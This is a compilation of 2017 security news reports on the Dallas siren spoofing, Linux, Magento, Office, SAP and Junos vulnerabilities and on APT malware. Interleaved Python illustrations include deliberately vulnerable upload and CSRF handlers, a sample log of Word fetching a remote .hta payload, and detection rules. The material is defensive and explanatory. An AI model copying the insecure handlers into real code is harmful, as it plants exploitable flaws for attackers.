Last weekend, when outdoor emergency sirens in Dallas cried loudly for over 90 minutes, many researchers concluded that hackers had hijacked the alarm system by exploiting an issue in a vulnerable computer network.
But it turns out that the hackers did not breach Dallas' emergency services computer systems to trigger the city's outdoor sirens for tornado warnings and other emergencies; rather, they did it entirely over radio.
According to a statement issued on Monday, Dallas City Manager T.C. Broadnax clarified the cause of the last Friday's chaos, saying the "hack" used a radio signal that spoofed the system used to control the siren network centrally.
"I don't want someone to understand how it was done so that they could try to do it again," Broadnax said without going much into details. "It was not a system software issue; it was a radio issue."
First installed in 2007, the Dallas outdoor emergency warning system powers 156 sirens made by a company called Federal Signal.

The city officials did not provide details on how the Emergency Alert System (EAS) works, but noted that "it's a tonal-type system" that's usually controlled by tone combinations used by the EAS broadcast over the National Weather Service's weather radio, and by Dual-Tone Multi-Frequency (DTMF) or Audio Frequency Shift Keying (AFSK) encoded commands from a command center terminal sent over an emergency radio frequency.
The Federal Communications Commission (FCC) currently has the 700MHz range of radio frequency reserved for US public safety.
This suggests that the emergency system could be compromised by outside radio equipment replicating the tonal code required to trigger the alarms — which, in other words, is known as a "radio replay" attack.
It is believed that the hacker who managed to trigger the alarm last Friday somehow gained access to the siren system documentation to learn the exact tonal commands that trigger an alarm, and then simply played that command signal repeatedly.
According to the city officials, the decade-old radio-based system was disabled hours after the breach and went live over the weekend with encryption to protect the language of tones as a measure to prevent such attacks.
The Dallas City Council has also voted to pay $100,000 more to its emergency siren system contractor to increase the security of the city's current system.
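The failure mode above (a tone sequence that any radio can reproduce) and the class of fix the city adopted (protecting the command language) can be shown with a small simulation. This is an added illustration, not code from the article or from the siren vendor; the tone string, the shared key and the HMAC-plus-counter scheme are all constructed assumptions, and the real system's tones and encryption are not reproduced.

```python
import hashlib
import hmac

# Constructed stand-in for the tone sequence a legacy controller listens for.
# It is not the real Dallas code, which the article deliberately withholds.
LEGACY_ACTIVATION_TONES = "DTMF:*41#"


class LegacySirenController:
    """Tone-only controller: any transmitter that reproduces the tones is obeyed,
    so a recorded activation played back later works just as well."""

    def __init__(self, activation_tones):
        self.activation_tones = activation_tones
        self.activations = 0

    def receive(self, frame):
        if frame == self.activation_tones:
            self.activations += 1
            return True
        return False


def _mac(key, command, counter):
    """Authentication tag over command and counter under a shared key."""
    return hmac.new(key, f"{command}|{counter}".encode(), hashlib.sha256).hexdigest()


class AuthenticatedSirenController:
    """Frame = 'COMMAND|counter|hex_mac'. The MAC binds the command and counter to a
    shared key, and the counter must strictly increase, so a captured frame that is
    replayed later (or tampered with) is rejected."""

    def __init__(self, key):
        self.key = key
        self.last_counter = 0
        self.activations = 0

    def receive(self, frame):
        parts = frame.split("|")
        if len(parts) != 3:
            return False
        command, counter_str, mac = parts
        if not counter_str.isdigit():
            return False
        if len(mac) != 64 or any(ch not in "0123456789abcdef" for ch in mac):
            return False
        counter = int(counter_str)
        if not hmac.compare_digest(_mac(self.key, command, counter), mac):
            return False          # forged or corrupted frame
        if counter <= self.last_counter:
            return False          # replay of an already-seen frame
        self.last_counter = counter
        if command == "ACTIVATE":
            self.activations += 1
            return True
        return False


def command_center_frame(key, command, counter):
    """What the legitimate command center transmits for one command."""
    return f"{command}|{counter}|{_mac(key, command, counter)}"


def demo():
    """Returns (legacy activations, authenticated activations) after the same
    frame is transmitted once legitimately and then replayed twice."""
    legacy = LegacySirenController(LEGACY_ACTIVATION_TONES)
    for _ in range(3):                       # one real send plus two replays
        legacy.receive(LEGACY_ACTIVATION_TONES)

    key = b"constructed-shared-key"          # constructed; provisioned out of band
    auth = AuthenticatedSirenController(key)
    frame = command_center_frame(key, "ACTIVATE", 1)
    for _ in range(3):
        auth.receive(frame)
    return legacy.activations, auth.activations


if __name__ == "__main__":
    print(demo())   # (3, 1): the legacy controller fires on every replay
```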


CVE-2016-10229 Linux remote code execution flaw potentially exposes systems at risk of hack
14.4.2017 securityaffairs  Vulnerability

The Linux remote vulnerability tracked as CVE-2016-10229 puts Linux systems at risk of hack if not patched.
A Linux kernel vulnerability, tracked as CVE-2016-10229, potentially allows attackers to remotely take over a vulnerable system (i.e. servers, desktops, IoT devices and mobile devices).

“udp.c in the Linux kernel before 4.5 allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag.” reads the description of the flaw published by the NVD.

The CVE-2016-10229 flaw exposes systems to attacks via UDP traffic. According to the experts, attackers can potentially hack a system running software that receives data through the recv() system call with the MSG_PEEK flag set. This means that attackers would send specifically crafted packets to the target that trigger the CVE-2016-10229 flaw by forcing a second checksum operation on the incoming data. In this way, the attacker can execute malicious code within the kernel with root privileges. Fortunately, the issue is hard to exploit, as explained by the popular Google Project Zero hacker Tavis Ormandy.

Dan Rosenberg (@djrbliss): "I have reviewed the relevant code and I mostly understand it, but I'm missing the security ramifications."
Tavis Ormandy (@taviso), 7:18 PM - 13 Apr 2017: "@djrbliss I'm as confused as you are..."
Common software, like the Nginx web server, sets the MSG_PEEK flag on some connections, potentially exposing the system to the attack.
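To make the affected code path concrete, here is the recv()-with-MSG_PEEK pattern the description refers to, exercised against a loopback UDP socket. This is an added example, not code from the article or from the kernel; it only shows the peek-then-read sequence that a vulnerable kernel handled twice, with a constructed datagram, and does not trigger the bug.

```python
import socket


def peek_then_read(payload):
    """Send a constructed datagram to a loopback UDP socket, copy it out with
    MSG_PEEK (the kernel leaves it queued), then read it for real.
    Returns (peeked_bytes, read_bytes, queue_empty_afterwards)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("127.0.0.1", 0))             # kernel picks a free port
        sock.sendto(payload, sock.getsockname())
        # First copy: MSG_PEEK. The datagram stays on the receive queue, so the
        # kernel has to deal with its checksum state again on the next copy;
        # that second handling is where CVE-2016-10229 lived before 4.5.
        peeked = sock.recv(65535, socket.MSG_PEEK)
        # Second copy: a normal recv dequeues the very same datagram.
        read = sock.recv(65535)
        # Nothing should be left; a non-blocking recv on an empty queue raises.
        sock.setblocking(False)
        try:
            sock.recv(65535)
            queue_empty = False
        except BlockingIOError:
            queue_empty = True
    finally:
        sock.close()
    return peeked, read, queue_empty


def peek_is_consistent(payload):
    """True when both copies return the same bytes and the queue drains once."""
    peeked, read, queue_empty = peek_then_read(payload)
    return peeked == read == payload and queue_empty


if __name__ == "__main__":
    print(peek_is_consistent(b"constructed datagram"))  # True
```

On a patched kernel the two copies are indistinguishable from user space; the only reliable check for the bug itself is the running kernel's patch level, since distributions backport the fix without bumping the version.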

The bug can also be potentially exploited by a local attacker to escalate privileges.

The vulnerability was discovered by Google expert Eric Dumazet, who explained that the issue dates back to the end of 2015, when a small fix was applied to the Linux kernel.

Kernel versions below 4.5, all the way down to 2.6, are likely at risk; major Linux distributions such as Ubuntu and Debian were distributing fixed builds of the kernel by February this year.

According to Red Hat, its Linux distributions were never affected by the CVE-2016-10229 flaw.

Google has already rolled out security patches for Android that also fixed the CVE-2016-10229 in mobile devices.

“So, in short, yes, there is a remote kernel-level code execution vulnerability in Linux, which sounds like the worst of the very worst, but it is pretty much patched by now – and it appears to be tricky to exploit. It was silently addressed in the kernel source over a year ago, and fixed in updates to machines earlier this year, but only now has it come to wider attention.” reported The Register.


Hundreds of thousands of Magento e-shops are exposed to hack due to an unpatched flaw
14.4.2017 securityaffairs  Vulnerability

An unpatched vulnerability in the Magento platform could be exploited by hackers to fully compromise the web servers that host the e-commerce sites.
An unpatched vulnerability in the Magento e-commerce platform could be exploited by attackers to upload and execute malicious PHP scripts on web servers that host online shops.

The vulnerability was reported by experts at the security firm DefenseCode; the issue resides in a feature that retrieves preview images for Vimeo videos. The feature was implemented to allow Magento admins to add videos to product listings.

The experts noticed that if the image URL references a different file, such as a PHP script, Magento will download the file to validate it. If the file is not an image, Magento will display the message “Disallowed file type”, leaving it on the server.

An attacker triggering the vulnerability could remotely execute code by first tricking Magento to download an .htaccess configuration file that enables PHP execution inside the download directory and then downloading a malicious PHP script that can work as a backdoor.

At this point the backdoor can be accessed via the browser; the experts explained that the attacker can use the script to browse the server directories and read the database password from Magento’s configuration file.

The vulnerability could be exploited only by an authenticated attacker, even if it is a lower-privileged user.

The experts added that if the Magento e-shop doesn’t have the “Add Secret Key to URLs” option turned on, the attacker can launch a cross-site request forgery (CSRF) attack to force a user’s browser to perform an unauthorized request on a website when visiting a different one.

The attacker can hack the Magento shop by tricking the victims into clicking on a link shared by mail or by visiting a specifically crafted web page.

The attack will work against all users who have active Magento sessions in their browser; by exploiting this attack vector, hackers might take over users’ accounts.

“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks.” reads the advisory published by DefenseCode.

“The attack can be constructed as simple as “

DefenseCode reported these issues to the Magento development team in November, but the flaws are still unpatched and almost all Magento CE versions are affected.

Below is the disclosure timeline:
11/18/2016 Vendor contacted via BugCrowd platform
11/18/2016 Vendor responded – aware of issue
04/11/2017 Vendor contacted again without response
04/13/2017 Advisory released to the public
In order to mitigate the attack, experts suggest enforcing the use of ‘Add Secret Key to URLs’.
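The two weaknesses described above, a download that is validated only after it has been written to a web-served directory and a CSRF token that is checked only on POST, are easy to show side by side with their hardened forms. This is an added illustration in Python, not Magento's PHP code; the handler names, the image signatures and the in-memory "storage" dictionary are assumptions made for the example.

```python
import secrets

# Constructed image signatures for the example; a real validator would be stricter.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def image_type(data):
    """Identify an image by its leading bytes; None for anything else."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def store_preview_vulnerable(download, storage):
    """Mirrors the reported behaviour: write first, validate afterwards, and leave
    the rejected file where it landed. 'download' is (remote_filename, bytes)."""
    name, data = download
    storage[name] = data                     # already in the web-served directory
    if image_type(data) is None:
        return "Disallowed file type"        # ... but it is never removed
    return "ok"


def store_preview_hardened(download, storage):
    """Validate in memory before anything touches disk, and store under a
    server-chosen name so the remote file name cannot select '.htaccess' or '.php'."""
    name, data = download
    kind = image_type(data)
    if kind is None:
        return "Disallowed file type"        # nothing was written
    safe_name = f"{secrets.token_hex(8)}.{kind}"
    storage[safe_name] = data
    return "ok"


def save_video_vulnerable(method, params, session):
    """The form_key (CSRF token) is checked only on POST; re-sending the same
    parameters as GET skips the check, which is the bypass the advisory describes."""
    if method == "POST" and params.get("form_key") != session["form_key"]:
        return 403
    session["video_url"] = params.get("url")   # state change happens regardless
    return 200


def save_video_hardened(method, params, session):
    """A state-changing handler accepts POST only and always verifies the token."""
    if method != "POST":
        return 405
    supplied = params.get("form_key", "")
    if not secrets.compare_digest(supplied.encode(), session["form_key"].encode()):
        return 403
    session["video_url"] = params.get("url")
    return 200
```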


Targeted Malware Inflated With Junk Data to Avoid Detection

13.4.2017 securityweek Virus
A piece of malware used in targeted attacks aimed at South Korea and Japan is inflated with junk data in an effort to avoid detection. While the technique is not exactly new, researchers at Kaspersky Lab believe this particular malware is noteworthy.

The security firm came across the malware while analyzing attacks involving a malware toolkit dubbed “XXMM.” The threat, disguised as a file named srvhost.exe in an effort to avoid raising suspicion, had a size of more than 100 Mb.

Kaspersky’s investigation has revealed that the malware is a Trojan loader designed to activate a backdoor called “wali” by its author. The backdoor module is injected into the iexplore.exe process by the loader.

The size of malware samples typically ranges between a few kilobytes and a few megabytes, depending on how they are packaged. Cybercriminals have also been known to hide malware in movie or ISO files, which can result in malware that has a size of hundreds of megabytes or even a few gigabytes.

What makes Wali interesting is the fact that it’s not delivered as a 100 Mb file. The initial loader is roughly 1 Mb in size, but its two dropper components append tens of megabytes of garbage data to the final malware executable file.

Since the junk data is created dynamically by the droppers, the size of the malware file can vary. Kaspersky has seen both 50 Mb and 100 Mb samples in real world attacks, but experts have also observed a 200 Mb sample generated using the same technique.

Researchers believe this is also a noteworthy threat due to the fact that it has been used in targeted attacks.

“While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives,” explained Kaspersky’s Suguru Ishimaru.

“The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malware,” the expert added.
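The evasion Kaspersky describes can be reproduced against a scanner in a few lines: the same string match either fires or not depending only on whether a size cap is applied before the content is inspected. This is an added example, not Kaspersky's code or a real YARA rule; the marker string and the padded "sample" are constructed, and the cap models a `filesize < N` condition or a scanner-level size limit.

```python
MB = 1024 * 1024

# Constructed marker standing in for the strings a real rule would carry.
MARKER = b"CONSTRUCTED-LOADER-MARKER"


def constructed_sample(junk_size):
    """Build a fake dropped executable: a small real body followed by junk_size
    bytes of padding, like the droppers the article describes."""
    body = b"MZ" + b"\x00" * 510 + MARKER + b"\x00" * 512
    return body + b"\x00" * junk_size


def marker_present(data, chunk=4 * MB):
    """Stream through the file in overlapping chunks so large files are scanned
    without holding a second copy of the whole file; the overlap keeps a marker
    that straddles a chunk boundary visible."""
    overlap = len(MARKER) - 1
    pos = 0
    while pos < len(data):
        window = data[pos:pos + chunk + overlap]
        if MARKER in window:
            return True
        pos += chunk
    return False


def scan_with_size_cap(data, max_size, chunk=4 * MB):
    """Rule with a 'filesize < max_size' condition, the common performance habit:
    inflated files are dismissed before their strings are ever looked at."""
    if len(data) >= max_size:
        return False
    return marker_present(data, chunk)


def scan_without_size_cap(data, chunk=4 * MB):
    """Same strings, but no size condition (or one set far above what the
    droppers produce), so the inflated sample is still caught."""
    return marker_present(data, chunk)


def compare(junk_size, max_size=10 * MB):
    """(capped result, uncapped result) for a sample padded with junk_size bytes."""
    sample = constructed_sample(junk_size)
    return scan_with_size_cap(sample, max_size), scan_without_size_cap(sample)


if __name__ == "__main__":
    print(compare(1 * MB))    # (True, True): small dropper, both rules fire
    print(compare(20 * MB))   # (False, True): inflated dropper slips past the cap
```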


"Callisto" Cyberspies Target Europe, South Caucasus

13.4.2017 securityweek CyberSpy
F-Secure on Thursday published a report detailing the activities of Callisto, a threat actor whose primary goal appears to be intelligence gathering from entities interested in European foreign and security policy.

According to F-Secure, which hasn’t found any links between this and other known threat actors, the Callisto group has been active since at least October 2015. The hackers have been observed targeting various individuals and organizations in Eastern Europe and the South Caucasus region, which encompasses Georgia, Armenia and Azerbaijan.

In late 2015, when F-Secure started tracking Callisto, the group had sent out highly targeted Gmail phishing emails. Some of the messages were sent to personal email addresses, suggesting that the attackers had previously conducted reconnaissance. Experts believe the hackers managed to hijack some accounts and used them to send phishing emails to other targets.

In early 2016, the cyberspies sent spear-phishing emails carrying malicious documents to military and government officials, think tank employees and journalists. F-Secure is aware of the malicious emails sent to these individuals, but it’s unclear if the targets actually installed the malware on their systems.

The Word documents sent to targets embedded a piece of malware as an object, eliminating the need for using exploits. If recipients clicked on the document and allowed the package content to run when prompted, the malware would be executed.

The malware has been identified as Scout, one of the tools available in the RCS Galileo platform of Italian spyware maker Hacking Team. The company was hacked back in 2015 and many of its tools were leaked online. Researchers determined that the Callisto group used the installers that had been leaked at the time, rather than relying on the Galileo source code.

The Scout malware has been described as a light backdoor that can be used for reconnaissance and to install other malware on the infected system.

F-Secure’s analysis revealed that the Callisto group’s infrastructure had been linked to servers hosting stores that sell controlled substances, which suggests a possible cybercrime connection. Experts also discovered links between the infrastructure used by the threat actor and countries such as Russia, Ukraine and China.

“A cyber crime group with ties to a nation state, such as acting on behalf of or for the benefit of a government agency, is one potential explanation,” researchers said in their report. “However, we do not believe it is possible to make any definitive assertions regarding the nature or affiliation of the Callisto Group based on the currently available information.”

While F-Secure has not seen any Callisto attacks involving malware for more than a year, the security firm says the group is still active, with new phishing infrastructure set up every week.

It’s worth pointing out that the Russia-linked threat actor dubbed APT28, Pawn Storm and Fancy Bear has also been known to target entities in Eastern Europe and the Caucasus region.


Microsoft Kills Support for Windows Vista

13.4.2017 securityweek Security
While expected for some time, Microsoft this week ended support for its Windows Vista operating system. The change came into effect on April 11, the very same day Microsoft began rolling out the Windows 10 Creators Update to its users.

Windows Vista has been receiving software updates for the past 10 years, but Microsoft has decided that the time has come to move on.

“As of April 11, 2017, Windows Vista customers are no longer receiving new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft,” the company notes on its support website.

Data coming from netmarketshare shows that the move would impact only 0.72% of all desktop users out there, but that is still a significant figure, considering that many of the Windows Vista computers are used within business environments.

A November report from Duo Security revealed that 65% of the security company’s clients' Windows users were using Vista. The threat this poses to enterprise networks is amplified by the continuous use of an even older operating system within business environments: Windows XP. The platform currently has 7.44% of the desktop operating system market, yet it hasn’t received updates since 2014.

Now that support has ended, Windows Vista will continue to work as before, only that it will become increasingly vulnerable to security risks and malware. What’s more, Internet Explorer 9, which runs on Vista, isn’t supported either, meaning that users are exposed to additional threats when browsing the web using this application.

“Also, as more software and hardware manufacturers continue to optimize for more recent versions of Windows, you can expect to encounter more apps and devices that do not work with Windows Vista,” Microsoft says.

In fact, major browser makers have already announced their end of support for the platform. Mozilla revealed in December 2016 that it would no longer support Vista and XP starting this year, while Google’s Chrome 49 was the last browser iteration released for the two platforms. Gmail isn’t offering support for the operating systems either, after it dropped support for Chrome 53 and older versions in February.

To further push users to move away from Windows Vista, Microsoft also stopped providing Microsoft Security Essentials for download on this platform. Antimalware signature updates will continue to arrive for installed instances for a limited time, after which users will remain exposed to newer threats.

“Please note that Microsoft Security Essentials (or any other antivirus software) will have limited effectiveness on PCs that do not have the latest security updates. This means that PCs running Windows Vista will not be secure and will still be at risk for virus and malware,” Microsoft notes.


CVE-2017-0199 Zero Day exploit used to deliver FINSPY spyware
13.4.2017 securityaffairs Vulnerability

Security researchers at FireEye discovered that the Microsoft Word CVE-2017-0199 exploit was linked to cyberspying in the Ukraine conflict.
The zero-day vulnerability in Microsoft Office that was recently fixed by Microsoft was used to deliver a surveillance malware to Russian-speaking targets.

Security experts from firm FireEye spotted the targeted attacks leveraging specifically crafted Microsoft Word documents that pretend to be a Russian military training manual.

When the victim opens the document, the attack starts and the surveillance malware FinSpy is delivered; the malware is developed by a subsidiary of Gamma Group. Officially the software is offered for sale only to government agencies and law enforcement bodies, but privacy advocates speculate that the spyware is also sold to authoritarian regimes.

“FireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure.” reads the analysis published by FireEye. “Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.”

The experts are still investigating who is the final target of the attacks, however, the decoy document appears to have been published in the Donetsk People’s Republic, a breakaway region in Ukraine that’s received Russian support.

“As early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the “Donetsk People’s Republic” exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.” continues FireEye.

“The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the “Donetsk People’s Republic,” the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.”

The weaponized Russian training manual can download additional payloads along with another fake document claiming to be a Russian decree approving a forest management plan.

FireEye experts suspect that a non-state actor may have used the FinSpy software against targets, operating much like government operators do.

It is also possible that the zero-day exploit circulated in the cybercriminal underground: in March, a separate attack triggering the same flaw was spotted by the experts.

“As early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware. The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.” adds FireEye.

Different hacking groups likely obtained knowledge of the zero-day from the same source.


SAP Patches Critical Code Injection Flaw in TREX

13.4.2017 securityweek Vulnerability

SAP this week released its April 2017 set of patches. The most important of the 15 security notes resolves a Very High priority (Hot News) vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

Carrying a CVSS score of 9.4, and discovered by ERPScan, the note is the third in a series of patches that SAP has been releasing for NetWeaver Search and Classification (TREX) and NetWeaver Business Warehouse Accelerator (BWA) since December 2015, to prevent remote command execution. The issue was initially addressed with SAP Note 2234226, which was later updated with SAP Note 2273881, and now patched with SAP Note 2419592.

Onapsis, the firm that discovered the original vulnerability in 2015, explains that TREXNet, the internal communication protocol developed for TREX service, does not enforce any kind of authentication, but is required by TREX servers. This means that it exposes systems to malicious actors, who can remotely execute critical system and OS commands.

According to ERPScan, a company that specializes in securing SAP and Oracle products, because TREX is deployed in over a dozen SAP products, including SAP HANA, this vulnerability is considered one of the most widespread and severe SAP server-side issues. What’s more, the advisory with all the details was available on the web for 2 years, thus exposing numerous applications to attacks, ERPScan says.

“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX,” Mathieu Geli, Head of SAP Threat Intelligence at ERPScan and the researcher who discovered the issue, explains.

SAP’s April 2017 advisory reveals that three of the 15 security notes included in this month’s Security Patch Day were updates to previous notes, including one to a Remote Code Execution vulnerability in SAP GUI for Windows. Four of the security notes had a High severity rating, 8 were rated Medium risk, and two were considered Low severity.

ERPScan, on the other hand, says that there were 12 additional security notes included in this set of patches, for a total of 27 notes (17 SAP Security Patch Day Notes and 10 Support Package Notes).

7 of the patches were Missing Authorization Checks, 4 were Cross-Site request forgery, 3 Cross-Site Scripting, 2 Remote Code Execution (RCE), 2 XML external entity, 2 information disclosure, 2 denial of service, 1 open redirect, 1 buffer overflow, 1 directory traversal, and 2 other flaws.

In addition to the RCE flaw in TREX / BWA, SAP addressed three more vulnerabilities found by ERPScan researchers: a Cross-Site Scripting vulnerability in SAP NetWeaver Central Technical Configuration (CVSS Base Score: 6.3), a Cross-Site Scripting vulnerability in SAP NetWeaver Java Archiving Framework (CVSS Base Score: 6.1), and an XML external entity vulnerability in SAP Knowledge Management ICE Service (CVSS Base Score: 4.9).

Other critical issues SAP resolved this month include a Denial of service vulnerability in SAP SAPLPD (CVSS Base Score: 7.5), an XML external entity vulnerability in SAP Web Dynpro Flash Island (CVSS Base Score: 7.5), and a Missing authorization check vulnerability in SAP NetWeaver ADBC Demo Programs (CVSS Base Score: 6.3).

“After a pretty significant March Update, which included the highest critical note of the year (SAP HANA Self Service Vulnerability with CVSS 9.8 and other relevant High Priority notes) this is the second month with remote code injection vulnerabilities present. As a result, SAP Security Note #2419592 should be prioritized among the others as it implies a similar attack as the two others previously mentioned that impact TREX,” Onapsis says.


Juniper Networks Patches Several Flaws With Junos Updates

13.4.2017 securityweek Vulnerability
Updates released by Juniper Networks for its Junos operating system patch several high and medium severity vulnerabilities. The company has also updated some of the third-party software used by its products.

Juniper Networks informed customers on Tuesday that it has launched an investigation into the new batch of exploits made public last week by the hacker group calling itself Shadow Brokers. The first round of files leaked by the Shadow Brokers in the summer of 2016 was found to contain some exploits targeting devices running Juniper’s ScreenOS.

Until it determines if any of its products are targeted by the newly released exploits, which are believed to have been used by the NSA-linked Equation Group, Juniper Networks has released updates that patch several vulnerabilities in the FreeBSD-based Junos OS.

The most severe of the flaws, based on its CVSS score, is CVE-2016-10142, an issue related to the IPv6 protocol specification, namely ICMP Packet Too Big (PTB) messages. The vulnerability can be exploited for denial-of-service (DoS) attacks.

Another high severity flaw is CVE-2016-1886, a keyboard driver buffer overflow that can be exploited to cause a DoS condition, read parts of the kernel memory, or execute arbitrary code.

It’s worth pointing out that CVE-2016-10142 and CVE-2016-1886 are not specific to Juniper products; the vulnerabilities are in FreeBSD and other Linux distributions.

The third high severity vulnerability is CVE-2017-2313, a DoS issue that affects some Junos systems when BGP is enabled.

The medium severity weaknesses disclosed by the company this week are DoS flaws affecting various configurations. These security holes are tracked as CVE-2017-2313, CVE-2017-2312 and CVE-2017-2340.

Juniper is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.

The vendor also announced patches for vulnerabilities affecting its NorthStar Controller application, and updates for the BIND and NTP components used by the company’s products. The NTP and BIND patches applied by Juniper were first made available several months ago, and other fixes have since been released for both NTP and BIND.


Office 0-Day Abused in Latentbot, WingBird Attacks

13.4.2017 securityweek Vulnerability
A Microsoft Office 0-day vulnerability that was disclosed just days ago is already being exploited by attackers associated with malware families such as Latentbot and WingBird.

Tracked as CVE-2017-0199, the security bug allows a malicious actor to craft an RTF (Rich Text Format) document that downloads and executes a Visual Basic script containing PowerShell commands. Microsoft has already addressed the flaw, but not quickly enough to prevent malware such as the Dridex banking Trojan from abusing it in attacks.

The exploit for this vulnerability was found to bypass most mitigations available before a patch was released, and could also render Protected View useless, security researchers discovered. This means that attacks leveraging the vulnerability don’t require user interaction to be successful.

The exploit leverages Office’s Object Linking and Embedding (OLE) functionality to link to an HTA (HTML Application) file hosted on a remote server. When the user opens the RTF document received via spam email, winword.exe issues an HTTP request to retrieve the malicious HTA file, which loads and executes the malicious Visual Basic script. In turn, the script downloads and executes malware.

According to FireEye, the malicious scripts used in these incidents were also observed terminating the winword.exe processes (to hide a prompt from OLE2link) and loading decoy documents.
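The chain just described leaves two observable traces on an endpoint: an Office process fetching a remote .hta file, and that same process being terminated shortly after the fetch. The following detection logic, an added example rather than FireEye's or anyone's product code, runs those two checks over constructed telemetry lines; the log format, the pipe-separated fields, the process list and the 30-second window are all assumptions made for the example.

```python
import re

# Assumption for the example: which processes count as Office document hosts.
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# A URL whose path ends in .hta, optionally followed by a query string.
HTA_URL = re.compile(r"https?://[^\s]+\.hta(\?|$)", re.IGNORECASE)

# Constructed endpoint telemetry, not real logs. Fields: time|event|pid|process|detail
SAMPLE_LOG = """\
10:00:01|start|4120|winword.exe|C:\\Users\\u\\Downloads\\invoice.rtf
10:00:03|http|4120|winword.exe|http://203.0.113.10/template.hta
10:00:05|end|4120|winword.exe|exit_code=1
10:05:00|start|5000|winword.exe|C:\\Users\\u\\report.docx
10:05:02|http|5000|winword.exe|https://templates.example.org/letter.dotx
"""


def parse(log):
    """Turn the pipe-separated lines into dicts with the time in seconds."""
    events = []
    for line in log.splitlines():
        ts, event, pid, proc, detail = line.split("|", 4)
        h, m, s = (int(x) for x in ts.split(":"))
        events.append({
            "t": h * 3600 + m * 60 + s,
            "event": event,
            "pid": int(pid),
            "proc": proc.lower(),
            "detail": detail,
        })
    return events


def detect(events, window=30):
    """Return (pid, rule, url) alerts:
    office_fetches_hta            - an Office host requested a remote .hta file
    office_exits_after_remote_fetch - the host ended within `window` seconds of
                                    its last HTTP request, as the scripts that
                                    kill winword.exe to hide the prompt would cause"""
    alerts = []
    last_http = {}                       # pid -> (time, url) of latest request
    for e in events:
        if e["proc"] not in OFFICE_PROCESSES:
            continue
        if e["event"] == "http":
            last_http[e["pid"]] = (e["t"], e["detail"])
            if HTA_URL.search(e["detail"]):
                alerts.append((e["pid"], "office_fetches_hta", e["detail"]))
        elif e["event"] == "end" and e["pid"] in last_http:
            t0, url = last_http[e["pid"]]
            if e["t"] - t0 <= window:
                alerts.append((e["pid"], "office_exits_after_remote_fetch", url))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)   # two alerts for pid 4120, none for pid 5000
```

The second rule on its own is noisy (users close documents), so it is meant to raise the priority of the first rather than to alert alone.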

The security researchers stumbled upon such attacks designed to distribute a newer variant of Latentbot, a highly obfuscated bot that has been active since 2013. The bot has a highly modular plugin architecture and has been also associated with the Pony infostealer.

Latentbot packs different injection mechanisms for Windows XP (x86) and Windows 7 operating systems: it uses Attrib.exe patching and Svchost code Injection on the former, but injects code into svchost.exe directly on the latter.

Another attack abusing this vulnerability consisted of two malicious stages, and distributed a variant of the dropper known as WingBird (which has characteristics similar to FinFisher). Heavily obfuscated, the malware packs several anti-analysis measures, including a custom VM to slow analysis, and was recently associated with the activities of a threat group known as NEODYMIUM.

Netskope Threat Research Labs, on the other hand, say that this Office zero-day vulnerability can also be linked to the Godzilla botnet loader. The researchers observed that the IPs related to the loader were serving payloads associated with exploits for this bug, but say that they “cannot speculate that the spam campaign and zero-day are related,” although the same attack group appears to be behind the attacks.

Office users are advised to apply the newly released patches as soon as possible, to ensure they are protected from these attacks.


Critical bug in SAP TREX affects SAP HANA and other applications
13.4.2017 securityaffairs Vulnerability

SAP has issued a security patch for the SAP TREX search engine that also addresses a two-year-old critical vulnerability.
SAP has issued a security patch for the SAP TREX search engine that addresses vulnerabilities first discovered by the experts in 2015 and only partially fixed by a patch released in December 2015.

The SAP TREX search engine is used by many SAP products, including SAP HANA and its NetWeaver application and integration platform.

“SAP, the largest enterprise software maker, closed a critical vulnerability affecting SAP’s search engine TREX. The issue stayed exposed almost 2 years.” reads a blog post published by the company ERPScan that discovered the flaw. “The vulnerable component is included in the old SAP NetWeaver platform as well as in the new SAP HANA one, which makes it one of the most widespread and severe SAP server-side issues so far with CVSS score 9.4 out of 10. The vulnerability was identified by specialists at ERPScan,” “If exploited, the vulnerability would allow a remote attacker to get full control over the server without authorization.”

SAP was affected by a critical code injection vulnerability (SAP Security Note 2419592) that the company addressed with the 2015 patch; unfortunately, the problem was not completely solved.

Mathieu Geli from ERPScan discovered that the TREXNet communication protocol implemented in the SAP TREX search engine did not implement an authentication mechanism.

